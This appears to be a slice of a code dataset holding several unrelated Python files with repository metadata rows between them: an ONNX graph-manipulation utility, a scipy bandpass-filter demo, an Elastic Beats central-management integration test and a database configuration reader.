logger.debug(f"To find first {parent_op_type}, current {parent.op_type}")
return None, None
def match_parent(self,
node,
parent_op_type,
input_index=None,
output_name_to_node=None,
exclude=[],
return_indice=None):
'''
Find parent node based on constraints on op_type and index.
        When input_index is None, we will find the first parent node based on the constraints, and the corresponding input index will be appended to return_indice.
Args:
node (str): current node name.
parent_op_type (str): constraint of parent node op_type.
input_index (int or None): only check the parent given input index of current node.
output_name_to_node (dict): dictionary with output name as key, and node as value.
exclude (list): list of nodes that are excluded (not allowed to match as parent).
return_indice (list): a list to append the input index when input_index is None.
Returns:
parent: The matched parent node.
'''
assert node is not None
assert input_index is None or input_index >= 0
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
if input_index is None:
parent, index = self.match_first_parent(node, parent_op_type, output_name_to_node, exclude)
if return_indice is not None:
return_indice.append(index)
return parent
if input_index >= len(node.input):
logger.debug(f"input_index {input_index} >= node inputs {len(node.input)}")
return None
parent = self.get_parent(node, input_index, output_name_to_node)
if parent is not None and parent.op_type == parent_op_type and parent not in exclude:
return parent
if parent is not None:
logger.debug(f"Expect {parent_op_type}, Got {parent.op_type}")
return None
def match_parent_paths(self, node, paths, output_name_to_node):
for i, path in enumerate(paths):
assert isinstance(path, List) or isinstance(path, Tuple)
return_indice = []
matched = self.match_parent_path(node, path[0], path[1], output_name_to_node, return_indice)
if matched:
return i, matched, return_indice
return -1, None, None
def match_parent_path(self,
node,
parent_op_types,
parent_input_index,
output_name_to_node=None,
return_indice=None):
'''
Find a sequence of input edges based on constraints on parent op_type and index.
        When an element of parent_input_index is None, the first matching parent for that edge is found based on op_type, and the corresponding input index will be appended to return_indice.
Args:
node (str): current node name.
parent_op_types (str): constraint of parent node op_type of each input edge.
parent_input_index (list): constraint of input index of each input edge. None means no constraint.
output_name_to_node (dict): dictionary with output name as key, and node as value.
return_indice (list): a list to append the input index when there is no constraint on input index of an edge.
Returns:
parents: a list of matched parent node.
'''
assert (len(parent_input_index) == len(parent_op_types))
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
current_node = node
matched_parents = []
for i, op_type in enumerate(parent_op_types):
matched_parent = self.match_parent(current_node,
op_type,
parent_input_index[i],
output_name_to_node,
exclude=[],
return_indice=return_indice)
if matched_parent is None:
logger.debug(f"Failed to match index={i} parent_input_index={parent_input_index[i]} op_type={op_type}",
stack_info=True)
return None
matched_parents.append(matched_parent)
current_node = matched_parent
return matched_parents
def find_first_child_by_type(self, node, child_type, input_name_to_nodes=None, recursive=True):
children = self.get_children(node, input_name_to_nodes)
dq = deque(children)
while len(dq) > 0:
current_node = dq.pop()
if current_node.op_type == child_type:
return current_node
if recursive:
children = self.get_children(current_node, input_name_to_nodes)
for child in children:
dq.appendleft(child)
return None
def find_first_parent_by_type(self, node, parent_type, output_name_to_node=None, recursive=True):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
parents = self.get_parents(node, output_name_to_node)
dq = deque(parents)
while len(dq) > 0:
current_node = dq.pop()
if current_node.op_type == parent_type:
return current_node
if recursive:
parents = self.get_parents(current_node, output_name_to_node)
for parent in parents:
dq.appendleft(parent)
return None
def get_constant_value(self, output_name):
for node in self.get_nodes_by_op_type('Constant'):
if node.output[0] == output_name:
for att in node.attribute:
if att.name == 'value':
return numpy_helper.to_array(att.t)
        # Fall back to initializer since constant folding might have been
# applied.
initializer = self.get_initializer(output_name)
if initializer is not None:
return numpy_helper.to_array(initializer)
return None
def get_constant_input(self, node):
for i, input in enumerate(node.input):
value = self.get_constant_value(input)
if value is not None:
return i, value
return None, None
def find_constant_input(self, node, expected_value, delta=0.000001):
i, value = self.get_constant_input(node)
if value is not None and value.size == 1 and abs(value - expected_value) < delta:
return i
return -1
def is_constant_with_specified_dimension(self, output_name, dimensions, description):
value = self.get_constant_value(output_name)
if value is None:
logger.debug(f"{description} {output_name} is not initializer.")
return False
if len(value.shape) != dimensions:
logger.debug(f"{description} {output_name} shall have {dimensions} dimensions. Got shape {value.shape}")
return False
return True
def has_constant_input(self, node, expected_value, delta=0.000001):
return self.find_constant_input(node, expected_value, delta) >= 0
def get_children_subgraph_nodes(self, root_node, stop_nodes, input_name_to_nodes=None):
if input_name_to_nodes is None:
input_name_to_nodes = self.input_name_to_nodes()
children = input_name_to_nodes[root_node.output[0]]
unique_nodes = []
dq = deque(children)
while len(dq) > 0:
current_node = dq.pop()
if current_node in stop_nodes:
continue
if current_node not in unique_nodes:
unique_nodes.append(current_node)
for output in current_node.output:
if output in input_name_to_nodes:
children = input_name_to_nodes[output]
for child in children:
dq.appendleft(child)
return unique_nodes
def tensor_shape_to_list(self, tensor_type):
""" Convert tensor shape to list
"""
shape_list = []
for d in tensor_type.shape.dim:
if (d.HasField("dim_value")):
shape_list.append(d.dim_value) # known dimension
elif (d.HasField("dim_param")):
shape_list.append(d.dim_param) # unknown dimension with symbolic name
else:
shape_list.append("?") # shall not happen
return shape_list
def convert_list_to_tensor(self, name, type, shape, value):
""" Convert list to tensor
"""
return helper.make_tensor(name, type, shape, value)
def change_input_output_float32_to_float16(self):
""" Change graph input and output data type from FLOAT to FLOAT16
"""
original_opset_version = self.model.opset_import[0].version
graph = self.graph()
new_graph_inputs = []
for input in graph.input:
if input.type.tensor_type.elem_type == TensorProto.FLOAT:
new_graph_inputs.append(
helper.make_tensor_value_info(input.name, TensorProto.FLOAT16,
self.tensor_shape_to_list(input.type.tensor_type)))
else:
new_graph_inputs.append(input)
new_graph_outputs = []
for output in graph.output:
if output.type.tensor_type.elem_type == TensorProto.FLOAT:
new_graph_outputs.append(
helper.make_tensor_value_info(output.name, TensorProto.FLOAT16,
self.tensor_shape_to_list(output.type.tensor_type)))
else:
new_graph_outputs.append(output)
graph_def = helper.make_graph(graph.node,
'float16 inputs and outputs',
new_graph_inputs,
new_graph_outputs,
initializer=graph.initializer,
value_info=graph.value_info)
self.model = helper.make_model(graph_def, producer_name='onnxruntime-tools')
# restore opset version
self.model.opset_import[0].version = original_opset_version
def convert_model_float32_to_float16(self, cast_input_output=True):
""" Convert a graph to FLOAT16
"""
graph = self.model.graph
initializers = graph.initializer
for initializer in initializers:
if initializer.data_type == 1:
initializer.CopyFrom(
numpy_helper.from_array(numpy_helper.to_array(initializer).astype(np.float16), initializer.name))
for node in graph.node:
if node.op_type in ['Constant', 'ConstantOfShape']:
for att in node.attribute:
if att.name == 'value' and att.t.data_type == 1:
att.CopyFrom(
helper.make_attribute(
"value", numpy_helper.from_array(numpy_helper.to_array(att.t).astype(np.float16))))
if node.op_type == 'Cast':
for att in node.attribute:
if att.name == 'to' and att.i == 1:
att.CopyFrom(helper.make_attribute("to", int(TensorProto.FLOAT16)))
if not cast_input_output:
self.change_input_output_float32_to_float16()
return
# Below assumes that we keep input and output data types.
# Add Cast node to convert input from float32 to float16.
for input_value_info in graph.input:
if input_value_info.type.tensor_type.elem_type == TensorProto.FLOAT:
initializer = self.get_initializer(input_value_info.name)
if initializer is not None: # for compatibility for old converter/exporter
input_value_info.type.tensor_type.elem_type = TensorProto.FLOAT16
else:
cast_input = input_value_info.name
cast_output = input_value_info.name + '_float16'
self.replace_input_of_all_nodes(cast_input, cast_output)
cast_node = helper.make_node('Cast', inputs=[cast_input], outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.FLOAT16))])
self.add_node(cast_node)
# Add Cast node to convert output from float16 back to float32.
for output_value_info in graph.output:
if output_value_info.type.tensor_type.elem_type == TensorProto.FLOAT:
cast_input = output_value_info.name + '_float16'
cast_output = output_value_info.name
self.replace_output_of_all_nodes(cast_output, cast_input)
self.replace_input_of_all_nodes(cast_output, cast_input)
cast_node = helper.make_node('Cast', inputs=[cast_input], outputs=[cast_output])
cast_node.attribute.extend([helper.make_attribute("to", int(TensorProto.FLOAT))])
self.add_node(cast_node)
# create a new name for node
def create_node_name(self, op_type, name_prefix=None):
if op_type in self.node_name_counter:
self.node_name_counter[op_type] += 1
else:
self.node_name_counter[op_type] = 1
if name_prefix is not None:
full_name = name_prefix + str(self.node_name_counter[op_type])
else:
full_name = op_type + "_" + str(self.node_name_counter[op_type])
# Check whether the name is taken:
nodes = self.get_nodes_by_op_type(op_type)
for node in nodes:
if node.name == full_name:
raise Exception("Node name already taken:", full_name)
return full_name
def find_graph_input(self, input_name):
for input in self.model.graph.input:
if input.name == input_name:
return input
return None
def find_graph_output(self, output_name):
for output in self.model.graph.output:
if output.name == output_name:
return output
return None
def get_parent_subgraph_nodes(self, node, stop_nodes, output_name_to_node=None):
if output_name_to_node is None:
output_name_to_node = self.output_name_to_node()
unique_nodes = []
parents = self.get_parents(node, output_name_to_node)
dq = deque(parents)
while len(dq) > 0:
current_node = dq.pop()
if current_node in stop_nodes:
continue
if current_node not in unique_nodes:
unique_nodes.append(current_node)
for input in current_node.input:
if input in output_name_to_node:
dq.appendleft(output_name_to_node[input])
return unique_nodes
def get_graph_inputs(self, current_node, recursive=False):
"""
Find graph inputs that linked to current node.
"""
graph_inputs = []
for input in current_node.input:
if self.find_graph_input(input) and input not in graph_inputs:
graph_inputs.append(input)
if recursive:
parent_nodes = self.get_parent_subgraph_nodes(current_node, [])
for node in parent_nodes:
for input in node.input:
if self.find_graph_input(input) and input not in graph_inputs:
graph_inputs.append(input)
return graph_inputs
@staticmethod
def input_index(node_output, child_node):
index = 0
for input in child_node.input:
if input == node_output:
return index
index += 1
return -1
def remove_unused_constant(self):
input_name_to_nodes = self.input_name_to_nodes()
#remove unused constant
unused_nodes = []
nodes = self.nodes()
for node in nodes:
if node.op_type == "Constant" and node.output[0] not in input_name_to_nodes:
unused_nodes.append(node)
self.remove_nodes(unused_nodes)
if len(unused_nodes) > 0:
logger.debug(f"Removed unused constant nodes: {len(unused_nodes)}")
def prune_graph(self, outputs=None):
"""
Prune graph to keep only required outputs. It removes unnecessary inputs and nodes.
        Nodes that are not linked (directly or indirectly) to any required output will be removed.
Args:
outputs (list): a list of graph outputs to retain. If it is None, all graph outputs will be kept.
"""
if outputs is None:
outputs = [output.name for output in self.model.graph.output]
output_name_to_node = self.output_name_to_node()
all_nodes = []
for output in outputs:
if output in output_name_to_node:
last_node = output_name_to_node[output]
if last_node in all_nodes:
continue
nodes = self.get_parent_subgraph_nodes(last_node, [])
all_nodes.append(last_node)
all_nodes.extend(nodes)
nodes_to_remove = []
for node in self.model.graph.node:
if node not in all_nodes:
nodes_to_remove.append(node)
self.remove_nodes(nodes_to_remove)
# remove outputs not in list
output_to_remove = []
for output in self.model.graph.output:
if output.name not in outputs:
output_to_remove.append(output)
for output in output_to_remove:
self.model.graph.output.remove(output)
# remove inputs not used by any node.
input_name_to_nodes = self.input_name_to_nodes()
input_to_remove = []
for input in self.model.graph.input:
if input.name not in input_name_to_nodes:
input_to_remove.append(input)
for input in input_to_remove:
self.model.graph.input.remove(input)
logger.info("Graph pruned: {} inputs, {} outputs and {} nodes are removed".format(
len(input_to_remove), len(output_to_remove), len(nodes_to_remove)))
self.update_graph()
def update_graph(self, verbose=False):
graph = self.model.graph
remaining_input_names = []
for node in graph.node:
if node.op_type != "Constant":
for input_name in node.input:
if input_name not in remaining_input_names:
remaining_input_names.append(input_name)
if verbose:
logger.debug(f"remaining input names: {remaining_input_names}")
# remove graph input that is not used
inputs_to_remove = []
for input in graph.input:
if input.name not in remaining_input_names:
inputs_to_remove.append(input)
for input in inputs_to_remove:
graph.input.remove(input)
names_to_remove = [input.name for input in inputs_to_remove]
logger.debug(f"remove {len(inputs_to_remove)} unused inputs: {names_to_remove}")
# remove weights that are not used
weights_to_remove = []
weights_to_keep = []
for initializer in graph.initializer:
if initializer.name not in remaining_input_names and not self.find_graph_output(initializer.name):
weights_to_remove.append(initializer)
else:
weights_to_keep.append(initializer.name)
for initializer in weights_to_remove:
graph.initializer.remove(initializer)
names_to_remove = [initializer.name for initializer in weights_to_remove]
logger.debug(f"remove {len(weights_to_remove)} unused initializers: {names_to_remove}")
if verbose:
logger.debug(f"remaining initializers:{weights_to_keep}")
self.remove_unused_constant()
def is_safe_to_fuse_nodes(self, nodes_to_remove, keep_outputs, input_name_to_nodes, output_name_to_node):
for node_to_remove in nodes_to_remove:
for output_to_remove in node_to_remove.output:
if output_to_remove in keep_outputs:
continue
if output_to_remove in input_name_to_nodes:
for impacted_node in input_name_to_nodes[output_to_remove]:
if impacted_node not in nodes_to_remove:
logger.debug(
f"it is not safe to remove nodes since output {output_to_remove} is used by {impacted_node}"
)
return False
return True
def save_model_to_file(self, output_path, use_external_data_format=False):
logger.info(f"Output model to {output_path}")
Path(output_path).parent.mkdir(parents=True, exist_ok=True)
if output_path.endswith(".json"): # Output text for testing small model.
assert isinstance(self.model, ModelProto)
with open(output_path, "w") as out:
out.write(str(self.model))
else:
# Save model to external data, which is needed for model size > 2GB
if use_external_data_format:
data_file = str(Path(output_path).name + ".data")
if os.path.isfile(data_file):
os.remove(data_file)
external_data_helper.convert_model_to_external_data(self.model,
all_tensors_to_one_file=True,
location=data_file)
save_model(self.model, output_path)
def get_graph_inputs_excluding_initializers(self):
"""
Returns real graph inputs (excluding initializers from older onnx model).
"""
graph_inputs = []
for input in self.model.graph.input:
if self.get_initializer(input.name) is None:
graph_inputs.append(input)
return graph_inputs
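# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# One plausible way to drive OnnxModel: load a model, prune it so that only the nodes
# feeding a single output remain, then save the result. The paths and the output name
# "logits" below are placeholders.
def _example_prune(model_path="model.onnx", keep_output="logits", pruned_path="pruned.onnx"):
    import onnx  # the onnx package is already required by the imports at the top of this file
    m = OnnxModel(onnx.load(model_path))
    m.prune_graph(outputs=[keep_output])  # drops nodes/inputs/outputs not needed for 'logits'
    m.save_model_to_file(pruned_path)
    return m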
| 40.12931
| 156
| 0.603688
|
1bba1b68a51a790a840ea314035b2bdbdf0ddc35
| 1,978
|
py
|
Python
|
pyFilter.py
|
bjohnson751/Body-Brain-Fusion-
|
d4b657aca6d1b465fdbcb09368241b7273fd4acf
|
[
"MIT"
] | null | null | null |
pyFilter.py
|
bjohnson751/Body-Brain-Fusion-
|
d4b657aca6d1b465fdbcb09368241b7273fd4acf
|
[
"MIT"
] | null | null | null |
pyFilter.py
|
bjohnson751/Body-Brain-Fusion-
|
d4b657aca6d1b465fdbcb09368241b7273fd4acf
|
[
"MIT"
] | null | null | null |
from scipy.signal import butter, lfilter
def butter_bandpass(lowcut, highcut, fs, order=5):
nyq = 0.5 * fs
low = lowcut / nyq
high = highcut / nyq
b, a = butter(order, [low, high], btype='band')
return b, a
def butter_bandpass_filter(data, lowcut, highcut, fs, order=5):
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
y = lfilter(b, a, data)
return y
if __name__ == "__main__":
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import freqz
# Sample rate and desired cutoff frequencies (in Hz).
fs = 5000.0
lowcut = 500.0
highcut = 1250.0
# Plot the frequency response for a few different orders.
plt.figure(1)
plt.clf()
for order in [3, 6, 9]:
b, a = butter_bandpass(lowcut, highcut, fs, order=order)
w, h = freqz(b, a, worN=2000)
plt.plot((fs * 0.5 / np.pi) * w, abs(h), label="order = %d" % order)
plt.plot([0, 0.5 * fs], [np.sqrt(0.5), np.sqrt(0.5)],
'--', label='sqrt(0.5)')
plt.xlabel('Frequency (Hz)')
plt.ylabel('Gain')
plt.grid(True)
plt.legend(loc='best')
# Filter a noisy signal.
T = 0.05
    nsamples = int(T * fs)  # np.linspace expects an integer sample count
t = np.linspace(0, T, nsamples, endpoint=False)
a = 0.02
f0 = 600.0
x = 0.1 * np.sin(2 * np.pi * 1.2 * np.sqrt(t))
x += 0.01 * np.cos(2 * np.pi * 312 * t + 0.1)
x += a * np.cos(2 * np.pi * f0 * t + .11)
x += 0.03 * np.cos(2 * np.pi * 2000 * t)
plt.figure(2)
plt.clf()
plt.plot(t, x, label='Noisy signal')
y = butter_bandpass_filter(x, lowcut, highcut, fs, order=6)
plt.plot(t, y, label='Filtered signal (%g Hz)' % f0)
plt.xlabel('time (seconds)')
plt.hlines([-a, a], 0, T, linestyles='--')
plt.grid(True)
plt.axis('tight')
plt.legend(loc='upper left')
plt.show()
| 32.42623
| 79
| 0.530334
|
35a4f9949f9f43fdeded79aaf9c9f8b9b81cb7b7
| 10,247
|
py
|
Python
|
x-pack/libbeat/tests/system/test_management.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
x-pack/libbeat/tests/system/test_management.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2021-02-02T14:18:40.000Z
|
2022-03-20T15:07:30.000Z
|
x-pack/libbeat/tests/system/test_management.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2021-03-10T05:38:32.000Z
|
2021-08-16T13:11:19.000Z
|
import sys
import os
import glob
import json
import requests
import string
import random
import unittest
import time
from elasticsearch import Elasticsearch
from os import path
from base import BaseTest
# Disabled while waiting for artifacts from https://github.com/elastic/kibana/pull/31660
INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False)
# INTEGRATION_TESTS = False
TIMEOUT = 2 * 60
class TestManagement(BaseTest):
def setUp(self):
super(TestManagement, self).setUp()
        # NOTE: These options are tied to the specifics of the docker compose environment for
        # CM.
        self.es_host = os.getenv('ES_HOST', 'localhost') + ":" + os.getenv('ES_PORT', '9200')
self.es_user = "myelastic"
self.es_pass = "changeme"
self.es = Elasticsearch([self.get_elasticsearch_url()], verify_certs=True)
self.keystore_path = self.working_dir + "/data/keystore"
if path.exists(self.keystore_path):
            os.remove(self.keystore_path)
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_enroll(self):
"""
Enroll the beat in Kibana Central Management
"""
assert len(glob.glob(os.path.join(self.working_dir, "mockbeat.yml.*.bak"))) == 0
# We don't care about this as it will be replaced by enrollment
# process:
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
config_content = open(config_path, 'r').read()
exit_code = self.enroll(self.es_user, self.es_pass)
assert exit_code == 0
assert self.log_contains("Enrolled and ready to retrieve settings")
# Enroll creates a keystore (to store access token)
assert os.path.isfile(os.path.join(
self.working_dir, "data/keystore"))
# New settings file is in place now
new_content = open(config_path, 'r').read()
assert config_content != new_content
# Settings backup has been created
backup_file = glob.glob(os.path.join(self.working_dir, "mockbeat.yml.*.bak"))[0]
assert os.path.isfile(backup_file)
backup_content = open(backup_file).read()
assert config_content == backup_content
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_enroll_bad_pw(self):
"""
Try to enroll the beat in Kibana Central Management with a bad password
"""
# We don't care about this as it will be replaced by enrollment
# process:
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
config_content = open(config_path, 'r').read()
exit_code = self.enroll("not", 'wrong password')
assert exit_code == 1
# Keystore wasn't created
assert not os.path.isfile(os.path.join(
self.working_dir, "data/keystore"))
        # Settings haven't changed
new_content = open(config_path, 'r').read()
assert config_content == new_content
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_fetch_configs(self):
"""
Config is retrieved from Central Management and updates are applied
"""
# Enroll the beat
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
exit_code = self.enroll(self.es_user, self.es_pass)
assert exit_code == 0
index = self.random_index()
# Configure an output
self.create_and_assing_tag([
{
"type": "output",
"config": {
"_sub_type": "elasticsearch",
"hosts": [self.es_host],
"username": self.es_user,
"password": self.es_pass,
"index": index,
},
"id": "myconfig",
}
])
# Start beat
proc = self.start_beat(extra_args=[
"-E", "management.period=1s",
"-E", "keystore.path=%s" % self.keystore_path,
])
# Wait for beat to apply new conf
self.wait_log_contains("Applying settings for output")
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index, 1)
index2 = self.random_index()
# Update output configuration
self.create_and_assing_tag([
{
"type": "output",
"config": {
"_sub_type": "elasticsearch",
"hosts": [self.es_host],
"username": self.es_user,
"password": self.es_pass,
"index": index2,
},
"id": "myconfig",
}
])
self.wait_log_contains("Applying settings for output")
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index2, 1)
proc.check_kill_and_wait()
@unittest.skipIf(not INTEGRATION_TESTS,
"integration tests are disabled, run with INTEGRATION_TESTS=1 to enable them.")
def test_configs_cache(self):
"""
Config cache is used if Kibana is not available
"""
# Enroll the beat
config_path = os.path.join(self.working_dir, "mockbeat.yml")
self.render_config_template("mockbeat", config_path, keystore_path=self.keystore_path)
exit_code = self.enroll(self.es_user, self.es_pass)
assert exit_code == 0
index = self.random_index()
# Update output configuration
self.create_and_assing_tag([
{
"type": "output",
"config": {
"_sub_type": "elasticsearch",
"hosts": [self.es_host],
"username": self.es_user,
"password": self.es_pass,
"index": index,
}
}
])
# Start beat
proc = self.start_beat(extra_args=[
"-E", "management.period=1s",
"-E", "keystore.path=%s" % self.keystore_path,
])
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index, 1)
proc.check_kill_and_wait()
# Remove the index
self.es.indices.delete(index)
        # Cache should exist already, start with wrong kibana settings:
proc = self.start_beat(extra_args=[
"-E", "management.period=1s",
"-E", "management.kibana.host=wronghost",
"-E", "management.kibana.timeout=0.5s",
"-E", "keystore.path=%s" % self.keystore_path,
])
self.wait_until(lambda: self.log_contains("PublishEvents: "), max_timeout=TIMEOUT)
self.wait_documents(index, 1)
proc.check_kill_and_wait()
def enroll(self, user, password):
return self.run_beat(
extra_args=["enroll", self.get_kibana_url(),
"--password", "env:PASS", "--username", user, "--force"],
logging_args=["-v", "-d", "*"],
env={
'PASS': password,
})
def check_kibana_status(self):
headers = {
"kbn-xsrf": "1"
}
# Create tag
url = self.get_kibana_url() + "/api/status"
r = requests.get(url, headers=headers,
auth=(self.es_user, self.es_pass))
def create_and_assing_tag(self, blocks):
tag_name = "test%d" % int(time.time() * 1000)
headers = {
"kbn-xsrf": "1"
}
# Create tag
url = self.get_kibana_url() + "/api/beats/tag/" + tag_name
data = {
"color": "#DD0A73",
"name": tag_name,
}
r = requests.put(url, json=data, headers=headers,
auth=(self.es_user, self.es_pass))
assert r.status_code in (200, 201)
# Create blocks
url = self.get_kibana_url() + "/api/beats/configurations"
for b in blocks:
b["tag"] = tag_name
r = requests.put(url, json=blocks, headers=headers,
auth=(self.es_user, self.es_pass))
assert r.status_code in (200, 201)
# Retrieve beat ID
meta = json.loads(
open(os.path.join(self.working_dir, 'data', 'meta.json'), 'r').read())
# Assign tag to beat
data = {"assignments": [{"beatId": meta["uuid"], "tag": tag_name}]}
url = self.get_kibana_url() + "/api/beats/agents_tags/assignments"
r = requests.post(url, json=data, headers=headers,
auth=(self.es_user, self.es_pass))
assert r.status_code == 200
def get_elasticsearch_url(self):
return 'http://' + self.es_user + ":" + self.es_pass + '@' + \
            os.getenv('ES_HOST', 'localhost') + ':' + os.getenv('ES_PORT', '9200')
def get_kibana_url(self):
return 'http://' + os.getenv('KIBANA_HOST', 'kibana') + ':' + os.getenv('KIBANA_PORT', '5601')
def random_index(self):
return ''.join(random.choice(string.ascii_lowercase) for i in range(10))
def check_document_count(self, index, count):
try:
self.es.indices.refresh(index=index)
return self.es.search(index=index, body={"query": {"match_all": {}}})['hits']['total']['value'] >= count
except BaseException:
return False
def wait_documents(self, index, count):
self.wait_until(lambda: self.check_document_count(index, count), max_timeout=TIMEOUT, poll_interval=1)
| 35.092466
| 116
| 0.57812
|
a93a3d2f31d4cc39dfd563c251ac7c120cffe598
| 6,739
|
py
|
Python
|
configuration/configuration_data.py
|
diogo1790team/inphinity_DM
|
b20d75ee0485e1f406a25efcf5f2855631166c38
|
[
"MIT"
] | 1
|
2019-03-11T12:59:37.000Z
|
2019-03-11T12:59:37.000Z
|
configuration/configuration_data.py
|
diogo1790team/inphinity_DM
|
b20d75ee0485e1f406a25efcf5f2855631166c38
|
[
"MIT"
] | 21
|
2018-10-17T14:52:30.000Z
|
2019-06-03T12:43:58.000Z
|
configuration/configuration_data.py
|
diogo1790team/inphinity_DM
|
b20d75ee0485e1f406a25efcf5f2855631166c38
|
[
"MIT"
] | 6
|
2019-02-28T07:40:14.000Z
|
2019-09-23T13:31:54.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 26 08:26:09 2018
@author: Diogo
"""
import configparser
from pathlib import Path
import os
class Configuration_data:
"""
    This class holds the configuration values used to select a database and connect to it
"""
    def __init__(self, db_name="INPHINITY"):
"""
        Constructor of the configuration object. If no configuration file exists, the "internal" database is always used
        :param db_name: name of the database (INPHINITY, DOMINE, ...) according to those in mySQL
:type db_name: text - required
"""
self.db_name = db_name
self.host_ip = ""
self.usr_name = ""
self.pwd_db = ""
def check_config_file(self):
"""
This method check if a configuration file exists and return it.
:return: configparser object if exist or None in case of no
:rtype configparser object
"""
complete_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', 'configuration'))
config_file = Path(complete_path + '/database_config.ini')
if config_file.is_file():
config = configparser.ConfigParser()
config.read(complete_path + '/database_config.ini')
return config
else:
print('No configuration file, db inside is considered')
return None
def get_inphinity_db(self):
"""
        This method returns the INPHINITY database name used
:return: name of the database inphinity
:rtype string
"""
database_name = 'INPH_proj'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_inphinity']
return database_name
def get_domine_db(self):
"""
        This method returns the DOMINE database name used
:return: name of the database DOMINE
:rtype string
"""
database_name = 'domine_db_out'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_domine']
return database_name
def get_3did_db(self):
"""
        This method returns the 3did database name used
:return: name of the database 3did
:rtype string
"""
database_name = '3did_db_out'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_3did']
return database_name
def get_iPFAM_db(self):
"""
        This method returns the iPFAM database name used
        :return: name of the database iPFAM
:rtype string
"""
database_name = 'pfam_db_out'
config = self.check_config_file()
if config != None:
database_name = config['DATABASE']['name_database_iPFAM']
return database_name
def get_db_type(self):
"""
        This method returns the type of database used
Typically: 0 = mysql and 1 = postgresql
:return: type of database used
:rtype int
"""
id_db_used = -1
config = self.check_config_file()
if config != None:
id_db_used = config['CONFIG_ACCESS']['db_access']
return int(id_db_used)
def get_db_access(self):
"""
        This method returns the tags used to obtain the database access data and whether the connection is made from the server or locally
Typically DB: 0 = mysql, 1 = postgresql
Typically connection: 0 = inside, 1 = outside
:return: list[tag_host, tag_user, tag_pwd]
:rtype list[]
"""
type_database = -1
type_connection = -1
list_tags_db_access = []
config = self.check_config_file()
if config != None:
type_database = self.get_db_type()
type_connection = config['CONFIG_ACCESS']['db_connection']
if type_connection == 0:
list_tags_db_access.append('host_inside_trex')
else:
list_tags_db_access.append('host_outside_trex')
if type_database == 0:
list_tags_db_access.extend(('usr_mysql','pwd_mysql'))
else:
list_tags_db_access.extend(('usr_postgres','pwd_postgres'))
return list_tags_db_access
def get_host_ip(self, connection_location_tag):
"""
        This method returns the host ip used for the connection (typically inside or outside)
:param connection_location_tag: tag in the .ini file to obtain the IP
:type connection_location_tag: string - mandatory
:return: host adresse
:rtype string
"""
host_ip = ""
config = self.check_config_file()
if config != None:
host_ip = config['HOST'][connection_location_tag]
return host_ip
def get_user_data(self, usr_db, pwd_db):
"""
        This method returns the connection data used to perform the login
:param usr_db: tag in the .ini file to obtain the username
:param pwd_db: tag in the .ini file to obtain the pwd
:type usr_db: string - mandatory
:type pwd_db: string - mandatory
:return: list[username, pwd]
:rtype list[]
"""
data_connection = []
config = self.check_config_file()
if config != None:
data_connection.append(config['USER'][usr_db])
data_connection.append(config['PWD'][pwd_db])
return data_connection
def get_database_name(self):
"""
        Return the name of the database according to the ini file
:return: name of the database
:rtype string object
"""
database_name = ""
        if self.db_name == 'INPHINITY':
            database_name = self.get_inphinity_db()
        if self.db_name == 'DOMINE':
            database_name = self.get_domine_db()
        if self.db_name == '3DID':
            database_name = self.get_3did_db()
        if self.db_name == 'iPFAM':
            database_name = self.get_iPFAM_db()
return database_name
def get_database_connection_information(self):
"""
Return the data necessary for the database connection
:return: list[host, user, pwd, db_name]
:rtype list[]
"""
db_data_access = []
database_name = self.get_database_name()
list_accessdb = self.get_db_access()
host_ip = self.get_host_ip(list_accessdb[0])
user_pwd = self.get_user_data(list_accessdb[1], list_accessdb[2])
db_data_access = [database_name, host_ip, user_pwd[0], user_pwd[1]]
assert len(db_data_access) == 4
return db_data_access
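# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# Typical call sequence implied by the methods above: pick a database and fetch the
# [db_name, host, user, pwd] list needed to open a connection. Which values come back
# depends on database_config.ini (or the internal defaults when the file is missing).
def _example_connection_info():
    conf = Configuration_data('INPHINITY')
    db_name, host, user, pwd = conf.get_database_connection_information()
    return db_name, host, user, pwd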
| 29.687225
| 123
| 0.606173
|
96091e8a61d970add8582fd633b0d5c494e20d58
| 762
|
py
|
Python
|
python/pattern_server/pattern_server.py
|
multispot-software/LCOS_LabVIEW
|
bbf5653203bb734d1d2d1b31c7f65f309545de7a
|
[
"MIT"
] | null | null | null |
python/pattern_server/pattern_server.py
|
multispot-software/LCOS_LabVIEW
|
bbf5653203bb734d1d2d1b31c7f65f309545de7a
|
[
